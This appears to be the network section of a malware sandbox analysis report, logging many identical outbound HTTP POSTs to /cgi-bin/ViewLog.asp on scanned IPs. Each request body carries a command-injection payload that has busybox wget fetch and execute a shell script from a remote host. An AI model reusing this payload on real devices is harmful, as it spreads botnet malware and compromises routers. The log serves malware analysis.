                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      684192.168.2.153414831.136.79.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.054433107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:32.088309050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.232139111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.263792038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119232893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269906998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      685192.168.2.154853694.123.186.1168080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.078135967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      686192.168.2.155717894.122.212.68080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.078300953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      687192.168.2.153676494.120.255.838080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.080162048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      688192.168.2.154101262.29.103.468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.080785990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      689192.168.2.155909694.123.106.2498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.327410936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      690192.168.2.154650031.200.42.1618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.327735901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      691192.168.2.154784431.136.187.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.469439030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:30.104449987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.352336884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.880249023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.000089884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.983802080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:09.975320101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:50.934065104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      692192.168.2.153758231.136.108.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.485956907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:30.168457031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.512495041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.392348051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.768134117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:50.519800901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:12.023132086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:55.030119896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      693192.168.2.155767095.202.89.808080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.494121075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.755696058 CET36INHTTP/1.1 403 Forbidden


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      694192.168.2.154423894.123.180.2088080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.566042900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      695192.168.2.154272231.40.225.478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.568970919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.821563005 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:00:25 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3167
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
